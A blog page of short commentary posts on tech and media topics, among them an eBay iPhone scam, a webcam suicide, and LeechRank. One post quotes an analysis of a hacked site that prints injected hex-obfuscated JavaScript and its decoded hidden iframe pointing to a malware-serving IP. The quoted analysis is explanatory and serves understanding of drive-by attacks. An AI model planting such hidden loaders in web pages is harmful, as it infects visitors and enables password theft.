One-born-every-minute Department (contd.)

Posted on by

From The Inquirer

AT LEAST 23 PEOPLE fell for a scam from a bloke who claimed to be flogging an Apple iPhone on eBay.

One person was prepared to stump up $1,125 to own an iPhone before it reaches the shops, or indeed the manufacturers.

Apple has said that it will not be releasing the phone until sometime in June, but that did not stop eBay seller rgonzales23455 telling marks that he had six of them.

Computerworld emailed Rgonzales23455 and asked him how he got his paws on six of the machines before they had been released. He didn’t reply and neither did Apple.

eBay, however, said that it pulled the listings and was warning that any such listings claiming to be selling the Apple iPhone are in violation of eBay’s pre-sale policy.

A grisly ‘first’

Posted on by

From today’s edition of The Register

Police are investigating the unexplained death of a man who appeared to commit suicide in front of an audience of webcam chatroom users.

Kevin Neil Whitrick, 42, from Wellington in Shropshire, was found at about 11.15pm on Wednesday by officers who went to his home following a report from a fellow chatroom user.

Resuscitation attempts failed, and he was pronounced dead at the scene. A post mortem was carried out on Friday morning, which confirmed the cause of death as hanging. A Coroner’s inquest will open on Monday.

Mr Whitrick was father to 12-year old twins. His ex-wife said he suffered a very serious car accident in July 2006, and had never fully recovered.

Lead investigator Detective Chief Inspector Jon Groves said: “Our enquiries to date have revealed that Mr Whitrick was using a chatroom with a number of other people at the time of his death.

“We are liaising with the internet service provider at this time to contact other users who were online at the time of this incident and who may have information that could assist our enquiries.”

ConceptShare

Posted on by

Collaborative work is hard — and even harder when you have to do it online. So ConceptShare is an interesting idea — described as “Web-Based Idea and Design Sharing and Collaboration”. I can see lots of industrial applications for it.

Back to Basics

Posted on by

Stanford has launched an intriguing new project — Clean Slate Design for the Internet.

We believe that the current Internet has significant deficiencies that need to be solved before it can become a unified global communication infrastructure. Further, we believe the Internet’s shortcomings will not be resolved by the conventional incremental and ‘backward-compatible’ style of academic and industrial networking research. The proposed program will focus on unconventional, bold, and long-term research that tries to break the network’s ossification. To this end, the research program can be characterized by two research questions: “With what we know today, if we were to start again with a clean slate, how would we design a global communications infrastructure?”, and “How should the Internet look in 15 years?” We will measure our success in the long-term: We intend to look back in 15 years time and see significant impact from our program.

In the spirit of past successful inter-disciplinary research programs at Stanford, the program will be driven by research projects ‘from the ground up’. Rather than build a grand infrastructure and tightly coordinated research agenda, we will create a loosely-coupled breeding ground for new ideas. Some projects will be very small, while others will involve multiple researchers; our goal is to be flexible, creating the structure and identifying and focusing funds to support the best research in clean-slate design.

The subprime mortgage racket explained

Posted on by

At last! — an explanation I can understand of the biggest financial scandal since the Savings & Loan racket of the Reagan years. It’s by Steven Pearlstein of the Washington Post. In his talk at the interesting SNS Dinner in London recently, Mark Anderson went on about the subprime market at some length and I felt thoroughly abashed by my ignorance (for photograph of abashed blogger, see here!)

The downsides of ‘free’ information

Posted on by

Peter Wayner gave an interesting talk at Google pointing out the downsides of the decline in print journalism and suggesting some things that might be done about it. Here’s one of his ideas:

Let me say that I’m a big believer in fair use. I think it’s very important for people to be able to quote frequently and liberally. But some blogs take this to an extreme. It’s easy to find blogs that are 80, 90, even 95 percent borrowed text. Some frequently cut huge chunks of an article and then wrap it with the thinnest amount of comment. Not surprisingly, some of these folks are big believers in “fair use”. I can think of one blog where the writers spend more time agitating for fair use than they do writing their thin, snarky wrapper around huge blocks of borrowed text.

I don’t think these sites are necessarily bad, but I think they end up taking an unfair amount of the return on the content. Many sell ads and some even support nice lifestyles without consuming too much shoe leather in gathering the content.

So why not add another term to the exponentially growing PageRank equation. Declan McCullagh suggested this during dinner last night. Why not compute the fraction of the text that’s original and the fraction that’s borrowed? This is possible to do because most bloggers are kind enough to include a link to the original text. If they don’t, it’s usually possible for a few searches of complete sentences to find the original.

Let’s call this LeechRank. If 20% of the text is borrowed, let’s do nothing to the PageRank. If 50% is borrowed, we bump them down a few notches. If 80% is borrowed, let’s send them down 20 to 30 notches. And if 100% is borrowed, as some pirates do, well, let’s just knock them straight out to the bottom of the listings, sort of a way station on their trip to the circle in hell reserved for people who steal and destroy a person’s livelihood.

This is a very thoughtful speech. It highlights the fact that while the Web and the blogosphere can easily provide much of the crap (celeb gossip, lifestyle journalism, infotainment) that takes up so much space in today’s newspapers, there’s no indication yet that it could replace the expensive investigating and reporting that responsible newspapers (and broadcasters) do. In the UK, for example, Jonathan Aitken would have gone unpunished if the Guardian hadn’t taken a very risky legal stand and contested his libel action against the paper. The same thing happened recently when Alan Rusbridger challenged a gagging injunction that the Government had clapped against reporting a development in the “cash for honours” investigation.

Who in the emerging ecosystem will do things — take risks — like that? Google? Perish the thought.

I like the idea of a LeechRank!

Thanks to Tim O’Reilly for pointing me to the piece.

Multitasking: bad idea

Posted on by

Be warned! The New York Times reports that multitasking is bad for you.

Several research reports, both recently published and not yet published, provide evidence of the limits of multitasking. The findings, according to neuroscientists, psychologists and management professors, suggest that many people would be wise to curb their multitasking behavior when working in an office, studying or driving a car.

These experts have some basic advice. Check e-mail messages once an hour, at most. Listening to soothing background music while studying may improve concentration. But other distractions — most songs with lyrics, instant messaging, television shows — hamper performance. Driving while talking on a cellphone, even with a hands-free headset, is a bad idea.

In short, the answer appears to lie in managing the technology, instead of merely yielding to its incessant tug.

“Multitasking is going to slow you down, increasing the chances of mistakes,” said David E. Meyer, a cognitive scientist and director of the Brain, Cognition and Action Laboratory at the University of Michigan. “Disruptions and interruptions are a bad deal from the standpoint of our ability to process information.”

The new malware ecology

Posted on by

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of proptesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleages pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

script language=”javascript”> document.write( unescape(
‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E’
) );

That’s some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:

< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.

The absurdity of consistency

Posted on by

Quentin pointed me to this post in The Dilbert Blog. It reads, in part:

One of the most potent forms of persuasion has to do with people’s innate need to be consistent. Studies show that people will ignore logic and information to be consistent. (In other words, we are moist robots.) According to the research, humans are hardwired for consistency over reason. You already knew that: People don’t switch political parties or religions easily. What you didn’t know is how quickly and easily a manipulator can lock someone into a position.

For example, researchers asked people to write essays in support of a random point of view they did not hold. Months later, when surveyed, the majority held the opinion they wrote about, regardless of the topic. Once a person commits an opinion to writing – even an opinion he does not hold – it soon becomes his actual opinion. Not every time, but MOST of the time. The people in these experiments weren’t exposed to new information before writing their contrived opinions. All they did was sit down and write an opinion they didn’t actually have, and months later it became their actual opinion. The experiment worked whether the volunteers were writing the pro or the con position on the random topic.

Most of the truly stupid things done in this world have to do with this consistency principle. For example, once you define yourself as a loyal citizen of Elbonia, you do whatever the King of Elbonia tells you to do, no matter how stupid that is. And your mind invents reasons as to why dying is a perfectly good life strategy.

Right on. I’ve always thought that consistency is a peurile obsession. Oscar Wilde described it as “the last refuge of the unimaginative”. When Maynard Keynes was once accused (I think by a journalist) of changing his mind, he replied, “When the facts change, I change my mind. What do you do, sir?”

And one of the most nauseating aspects of modern British political journalism is the triumphant cry of “U Turn!” that goes up whenever a politician changes his or her mind. It seems to me that U-turns are a sure sign of a sentient, thinking being.

The Dilbert post attracted many idiotic comments, but one stood out from the crowd. It quoted this paragraph from Ralph Waldo Emerson’s essay on Self reliance:

A foolish consistency is the hobgoblin of little minds, adored by little statesmen and philosophers and divines. With consistency a great soul has simply nothing to do. He may as well concern himself with his shadow on the wall. Speak what you think now in hard words, and to-morrow speak what to-morrow thinks in hard words again, though it contradict every thing you said to-day. — ‘Ah, so you shall be sure to be misunderstood.’ — Is it so bad, then, to be misunderstood? Pythagoras was misunderstood, and Socrates, and Jesus, and Luther, and Copernicus, and Galileo, and Newton, and every pure and wise spirit that ever took flesh. To be great is to be misunderstood.

The very model of a modern creative society? I don’t think so

Posted on by

This morning’s Observer column

[Tom] Lehrer is famous for many things, but chief among them is his famous observation that ‘satire died the day Henry Kissinger was awarded the Nobel Peace Prize’. The song of his that I like most is ‘The Elements Song’, in which he recites the names of all the elements of the periodic table at high speed and without fudging a syllable, while at the same time playing a stirring piano accompaniment of what he described as ‘a barely recognisable tune’. It’s an astonishing performance and it resides happily on my iPod.

The other day, I chanced on a link to a lovely piece of Flash animation (see it for yourself here), in which a chap named Mike Stanfill took the Lehrer soundtrack and visually added the names of the elements in a witty – and technically very demanding – way. My first reaction was pure pleasure. My second thought was that this provides a good object lesson for understanding the current debate about intellectual property in a digital age…

Later… Adam Hodgkin pointed out a lovely Lehrer song about the virtues of plagiarism!